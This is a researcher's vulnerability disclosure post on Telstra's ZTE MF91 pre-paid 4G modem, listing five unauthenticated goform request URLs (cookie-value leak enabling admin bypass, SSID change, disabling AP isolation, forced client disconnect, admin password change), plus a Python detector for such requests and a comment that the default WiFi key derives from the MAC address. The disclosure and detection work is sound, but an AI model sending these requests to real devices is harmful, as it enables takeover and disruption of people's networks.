
Pwning Telstra’s ZTE MF91 Pre-paid 4G modem

Apparently, the average person in Australia carries 2.6 devices. For me, the 0.6 is my Telstra Pre-Paid 4G WiFi modem. All the main Aussie telcos have offerings in this space (Telstra/Optus/Vodafone/Virgin Mobile), and the devices provided usually are Huawei, ZTE or Sierra Wireless wifi modems.

I’ve been using this ZTE MF91 device as sold by Telstra for a couple of years now. Several months ago, I decided to give my MF91 a shakedown in the security space – and a bunch of bugs bubbled to the surface fairly quickly.

PoC
I wrote a basic script (zteeek) that exploits some of the vulnerabilities described below-  it’s available here (I’m not a coder, you’ve been warned, and so on). And here’s a video:

MF91 Vulnerabilities
The fact that you already need to be connected to the wireless network to exploit these makes them far less sexy, but nevertheless they are a good example of the kind of vulnerabilities that are common in embedded systems. Either a WPS attack or a plain old brute force wireless run against the MF91 would be your best way on to its wireless network – then you can have fun with zteeek. Here’s a quick description of the vulnerability/exploit pairs:

Unauthenticated cookie value disclosure
The core cookie value for authenticated sessions, MF91_Telstra_luck_num, can be retrieved via an unauthenticated GET request, after which an attacker can create their own valid admin session cookie to bypass authentication.
http://<deviceip>/goform/pwd_cmd?cmd=lucky_num

Unauthenticated SSID modification
The wireless SSID can be changed by tampering with the ssid parameter without authentication.
http://<deviceip>/goform/wlan_set_basic_sap_profile?ssid=new_SSID

Unauthenticated disabling of AP isolation mode
Access point isolation mode can be disabled without authentication, exposing isolated clients.
http://<deviceip>/goform/wlan_set_basic_sap_profile?=DISABLE

Unauthenticated denial of service (force client disconnect)
A denial of service attack causing the forced disconnection of all clients is possible via a GET request to dhcp_list_cmd without authentication.
http://<deviceip>/goform/dhcp_list_cmd?cmd=set&&mac_addr=

Unauthenticated administrator password change
The administrator password for the ZTE MF91 can be changed via a GET request to upd_pwd without authentication.
http://<deviceip>/goform/upd_pwd?password=<new password>
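
As an added example (not code from the post, from zteeek or from ZTE), the following Python detector walks HTTP request lines captured on the modem's wireless side and flags calls to the goform admin handlers listed above that carry no MF91_Telstra_luck_num session cookie. The log line format and the sample lines are constructed assumptions; the MF91 itself does not expose such a log, so the input would come from a proxy or packet capture exported to text.

```python
import re
from urllib.parse import urlsplit

# goform handlers named in the post; each performs an admin function
ADMIN_PATHS = {
    "/goform/pwd_cmd",                     # cmd=lucky_num leaks the cookie value
    "/goform/upd_pwd",                     # changes the admin password
    "/goform/wlan_set_basic_sap_profile",  # SSID / AP-isolation changes
    "/goform/dhcp_list_cmd",               # cmd=set&&mac_addr= kicks all clients
}
SESSION_COOKIE = "MF91_Telstra_luck_num"  # session cookie name from the post

# Constructed log format (assumption): src "METHOD url HTTP/x" status cookie="..."
LINE_RE = re.compile(
    r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) cookie="(?P<cookie>[^"]*)"$'
)

def has_session(cookie_header):
    """True if the request carried a non-empty MF91 session cookie."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == SESSION_COOKIE and value:
            return True
    return False

def find_unauthenticated_admin(lines):
    """Return (src, path, query) for admin-handler requests with no session."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected format
        u = urlsplit(m["url"])
        if u.path in ADMIN_PATHS and not has_session(m["cookie"]):
            hits.append((m["src"], u.path, u.query))
    return hits

SAMPLE_LOG = [  # constructed sample lines, not real captured traffic
    '192.168.0.23 "GET /goform/pwd_cmd?cmd=lucky_num HTTP/1.1" 200 cookie=""',
    '192.168.0.23 "GET /goform/upd_pwd?password=changed HTTP/1.1" 200 cookie=""',
    '192.168.0.10 "GET /goform/upd_pwd?password=x HTTP/1.1" 200 cookie="MF91_Telstra_luck_num=123456"',
    '192.168.0.10 "GET /index.html HTTP/1.1" 200 cookie=""',
    '192.168.0.23 "GET /goform/dhcp_list_cmd?cmd=set&&mac_addr= HTTP/1.1" 200 cookie=""',
]

if __name__ == "__main__":
    for src, path, query in find_unauthenticated_admin(SAMPLE_LOG):
        print(f"unauthenticated admin call from {src}: {path}?{query}")
```

Because the cookie value itself is disclosed by the first handler, a present cookie is only weak evidence of a legitimate admin; the check is most useful for spotting the initial cookie-less requests.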

Thank you CrikeyCon!
I was kindly invited to talk about the process around my dealings with the ZTE MF91 at CrikeyCon 2015 in Brisbane, which was a lot of fun. Many thanks to the CrikeyCon staff for entertaining a bunch of Aussie hackers on a very wet day in Brisbane, and thanks also to the fabulous and receptive people in attendance.

sw1tch

3 Comments

  1. Do you feel that the authentication required is the access to said WIFI network before these *hacks* can take place? It’s not like these are public hotspots, they are personal ones.

    It’s like saying, I can steal from my co-worker’s desk, but first I had to get access to the building.

    No disrespect, great insights!

    1. Correct. Likelihood is low from the perspective of a remote, unauthenticated attacker with no access to the wireless network. If you can sniff the MAC address, which is trivial, and the owner hasn’t changed the PSK then you have what you need to join the network as the default PSK is derived easily from the MAC address. Less concerned about this device as about all the other crud consumer and SOHO routers and gateways that use the same development processes, old libraries and packages and generally rush out cheap rubbish to unsuspecting end users.
